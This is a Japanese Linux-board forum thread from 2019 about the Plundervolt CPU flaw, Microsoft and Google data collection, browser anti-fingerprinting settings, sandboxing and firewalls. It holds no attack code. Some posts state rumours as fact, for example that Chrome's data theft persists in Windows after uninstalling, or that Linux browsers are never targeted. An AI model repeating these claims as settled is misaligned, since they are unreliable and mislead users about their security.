彡⌒ミ
(,,・_・).。oO( 毛深くなりたい・・・ )
ヾ(,_uuノ
114:login:Penguin
19/10/13 01:09:29 ueikBXbu.net
Google、Androidアプリでアップデートを各ユーザーに強制する方法を発表 | TechCrunch Japan
URLリンク(jp.techcrunch.com)
115:login:Penguin
19/10/25 00:20:33.72 j4GkuklA.net
>>6
それ違う
負けないためには、だね
コモドでいいよな?
116:login:Penguin
19/12/12 00:50:01.16 jaG34Ck9.net
IntelのCPUに脆弱性 [402859164]
スレリンク(poverty板)
供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
URLリンク(jp.techcrunch.com)
Plundervolt
URLリンク(plundervolt.com)
17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン?
19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>19
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた
26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>19
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ
117:login:Penguin
19/12/12 02:35:29.36 QpDguOY0.net
Linuxだから安全です。
118:login:Penguin
19/12/12 19:43:32.89 jaG34Ck9.net
>>116続き
44 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>21>28
なにこれ?
PC起動してないとCPUコントロール出来ないよね?
もしかして、ハードディスク暗号化してるPCを起動して、
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか?
>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします。
54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>46
ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる
63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>53
電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで
55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>56
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの?
119:login:Penguin
19/12/13 19:09:08.80 ESmGY9a7.net
>>117
コアダンプしそう
120:login:Penguin
19/12/13 19:14:21.26 ESmGY9a7.net
Ubuntuアップデートしたらマイクロコード降ってきたけどこれかね
流石にそこまで早くないか
121:login:Penguin
19/12/16 00:27:12.94 Oy6287lw.net
MicrosoftがUbuntu用のDefender出すんだって?
122:login:Penguin
19/12/16 05:28:15.87 AxOoqKNy.net
LinuxサーバーはAzureしか選択肢が無くなったかもかも。
123:login:Penguin
19/12/16 06:38:47.87 AxOoqKNy.net
iOSもカバーしてるからAzureが本命かもしれないよ。
WSLがどうでも良いわけじゃないだろうけど。
124:login:Penguin
19/12/16 20:16:03.60 F52Y2AF9.net
>>121
MSの個人情報搾取に耐えかねてubuntuに逃げてきたのに
追いかけてくるってか...
125:login:Penguin
19/12/17 02:23:31.85 eJqKdH1L.net
>>124
MSってそんな個人情報抜いてるの?
Skypeで抜いてるのにはびびったが。
あれはそこそこ信用してただけにびっくりした。
Skypeごときの情報抜かないだろうって思ってた。
MSってGoogle並みに個人情報抜いてるの?
Googleは怖くて使えんわ
あんなの住所氏名電話番号全部バレてるだろ
126:login:Penguin
19/12/17 03:54:51.93 +GuS9PLu.net
くこの板の一部の信者はMSに親を殺された!とかわめいてるけど、実はgoogleの方がヤバいっていうね
127:login:Penguin
19/12/17 07:05:33.11 BN1fWjc1.net
ユーザーはキンタマ握られてるから誰も言わないだけで一番ヤバいのはApple
128:login:Penguin
19/12/17 10:14:03.65 d36jgmOT.net
最近はWindowsのアカウント作る時にできるだけMSアカウントを
作らせるよう誘導してくるな
Win8あたりからだった記憶があるけど、Win10が大型アップデート
するたびにどんどん露骨になってる印象
129:login:Penguin
19/12/17 10:37:04.71 h64x6iyX.net
たしかに。
130:login:Penguin
19/12/17 21:04:10.21 IhVBQ6dn.net
OS以外のファイルはゴッソリ抜かれてるのに
Windows10とかOffice365とか無思慮に まして仕事で使ってるヤツの気が知れんわ
131:login:Penguin
19/12/17 21:15:21.09 486GIvh4.net
チョロメや考えなしに派生したクロを入れるのも
泥棒の手を引いて家ん中案内するようなもんだしね
132:login:Penguin
19/12/18 13:16:10.19 b8AkMopr.net
どれ使うのがええのん?
opensuseとfirefox?
133:login:Penguin
19/12/18 20:51:19.26 ng+ewP2B.net
俺はwinの時sandboxie上でcookieや履歴の設定をユルユルにしたfirefox使ってweb見終わったら丸消ししてたんだが
ubuntuにしてからは気軽に使えるsandboxが見当たらないんで仮想マシンにZorin LiteとFirefoxだけ入れてzipして
やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
多少手間だが これならいくらcookieやcanvas喰おうが いつもキレーなブラウザでインターネッツできると思ったんだけどね
砂箱スレでdockerもススメられたけど dockerはなんか違うかな?と思ったわ
134:login:Penguin
19/12/18 23:21:12.25 Ghj3q23V.net
【緊急警告】Google Chrome、Windows PC上の事実上全てのファイルを恒常的にスキャン
スレリンク(news板)
135:login:Penguin
19/12/19 13:08:27.51 eQXTO88z.net
>>132
firefoxに余計な機能をブロックするuser.jsを育てたものを使ってる
デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
GNUのicecat(firefox系)も良い感じ
>>133
firejail --private=<専用の一時ホームディレクトリ> とか?
canvasは個別に対応が必要だと思う
136:login:Penguin
19/12/19 15:29:49.65 hhS7ytBr.net
>>135
user.jsは一時期手を出してみたけど「これワザとやってんじゃないの?」っていうくらい あの設定ワードって言うの?
about:configで左側に表示されるワードが 余りに頻繁に変更されるんで 根負けしてバンザイしたわ
>canvasは個別に対応が必要だと思う
とりまCanvasBlock入れてるけどOPTIONは内容が意味フで何言ってるかわかんないから手がつけられないでいるわ
やっぱ色々と設定いじった方がいいもんなの?
137:login:Penguin
19/12/20 02:13:31.46 3v00n4yQ.net
operaやvivaldiはどんな評価やろ
138:login:Penguin
19/12/20 08:11:46.30 W5p7NQnV.net
GoogleがChromeやFirefox以外のブラウザを弾くようになって無理
139:login:Penguin
19/12/20 20:28:03.18 BMpjrsOC.net
つ参考
Browser Fingerprinting対策ツールの評価(pdf)
URLリンク(ipsj.ixsq.nii.ac.jp)
Web Browser Fingerprint解説ページ
URLリンク(www.saitolab.org)
140:login:Penguin
19/12/21 16:40:49.62 P2W6B/wx.net
まじで教えてチョメ クロ 危ないんですか?
火狐は大丈夫なら 前2者は早速削除したいと思います。
141:login:Penguin
19/12/21 16:56:46.98 P2W6B/wx.net
Sicklylifeさんはファイアーウオールは有効にしなくてもよい
とありますので、設定していませんが、入れれば幾らかでも
安全になるのでしょうか
142:login:Penguin
19/12/21 20:37:04.76 8u1F/kP3.net
>>140
Linux用ブラウザーを狙う奴なんていないから心配すんな。
あ、ブラウザー拡張機能は別な。拡張機能はOS問わずヤバいものがあるかもしれん。
>>141
例えばUbuntu新規インストしてupdate、dist-upgrade、rebootした後、
すぐにgufw入れてファイアーウォール有効にしても意味ないでしょ。
よく分かんないなら、とりあえずファイアーウォールは有効にしとけば?
143:login:Penguin
19/12/21 21:33:25.68 2yt7G6Gl.net
>>140
チョロメが個人情報泥棒ブラウザなのは周知の事実
何年か前からwin10にタメ張ってかなり大規模に盗みやってるらしいゾ
Win版のチョロはアンインストールしても 泥棒機能はOSの深いトコで生き続けるらしいから
もし無しにしたいのならOSの入れ直ししかねーんじゃね?
そんでせっかく金使って開発した泥棒機能をLinux版には入れていないなんて甘い見通しは無いと思うが?
ゴキグルから見たらwinユーザーもLinuxユーザーも同じ金だろうに
クロムもソースからゴキグルと通信する部分を削除していないのはアウトだと思っていーんじゃね?
144:login:Penguin
19/12/22 05:32:17.57 F7RmFDTN.net
>>141
セキュリティは上がる、とは言える
最初はgufw,慣れればiptablesがおすすめ(FWというかネットワークの詳細なコントロールが出来る)
例えばFW無しだと、WANインターフェイスか0.0.0.0でリッスン中のプロセスがあれば外から繋がる
これが設定ミスや脆弱性から悪用に発展する可能性、どんなプログラムを走らせてるのかバレる、DOSの可能性
ルーターの内側に居ればベーシックなFWの内側に居るのに近いけど、アプリがUPnPで勝手にルーターでポートを開ける事も無理じゃない
LAN内の相手からは普通に繋がるし、必ずしもルーターの内側にいるのか?リッスン中のアプリに設定ミスや脆弱性は無いのか?
FWはそういう可能性をカット出来る(公開する意図のない宛先には)
不要なアタックサーフェイスは狭めるのがセキュリティの基本
145:login:Penguin
19/12/22 10:24:37.91 QiAxui6d.net
小手先だけで、基礎の教養なしにubuntu を使っている小生には
ほとんど判りませんが、兎に角拡張機能は避ける、fireWallは有効にしてみました、
ご教示有難う存じました。
146:login:Penguin
19/12/23 03:58:31.72 fOOPeHWr.net
>>136-137
Canvasってなんだっけ?
CanvasってJavaScriptオフだと機能しないよね?
俺の勘違い?
147:login:Penguin
19/12/23 04:06:22.21 fOOPeHWr.net
Ubuntu18.04使用でブラウザはFirefox、Torbrowserしか入れてないわ
Chromeは論外で他に選択しないからこの2つ以外入れてない
Torスレでもなんか話題になってたけど、
普通のブラウジングするのにTorbrowserのTor機能だけ切るのはどうなの?
TorBrowserもFirefox基盤だけど、
>>135の
>デフォルトだとGの手が伸びてるし(safebrowsing)、テレメトリその他有効になってる…
にはなってないよね?
なにせTorBrowserだし・・・
148:login:Penguin
19/12/23 04:54:54.78 fOOPeHWr.net
>>133
>ubuntuにしてからは気軽に使えるsandboxが見当たらないんで
>仮想マシンにZorin LiteとFirefoxだけ入れてzipして
>やはりweb見終わったら仮想マシン丸消しして その都度zipから戻してる
なんでこんなめんどくさいことしてるの?
普通にFirefoxの全履歴削除すれば全部消えるんじゃないの?
UbuntuのJournalに履歴とか残るから?
149:login:Penguin
19/12/23 10:49:30.08 1IWvct7N.net
iptablesはもう古いよ
これからはnftablesだよ
150:login:Penguin
19/12/23 12:05:01.09 x1WXtyaO.net
履歴w
151:login:Penguin
19/12/23 17:23:14.88 Y4WL5T53.net
Oracle Linux の SELinux を disabled にしたら SSH で接続できなくなるのはなぜですか?
152:login:Penguin
19/12/24 11:41:20.66 NeirOfqJ.net
>>146
ここで言ってるのはfingerprinting技術
WEBにアクセスした時に、環境ごとにユニークな値を生成させて取得(同時にIPや他情報もなるべく取得)
その後IPを変えようがcookieやら消そうが同じようなユニークな値を取って紐付ければ特定に繋がる
ブラウザだとcanvas,audio,rectその他がフィンガープリントするのに使えるらしい
こんな追跡の仕方、技術の悪用に近いと思うけど…、色んな建前を使って取得&追跡されるのが常だからな
JSを切ればcanvasでは取れないような…?他もかなり良くなる
>>147
利便性とのバランスもあるけど、プライバシー重視なら俺もTor切ったTorBrowserは手っ取り早いと思う
プロ?集団がプライバシー重視でアンチフィンガープリンティングにも力を入れて設定&開発したんだ
公式でTor無しバージョンもリリースすれば良いのに
もちろんGやテレメトリその他色々無効になってる(about:configで確認出来る)
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5日前に更新/107 KB
担当:undef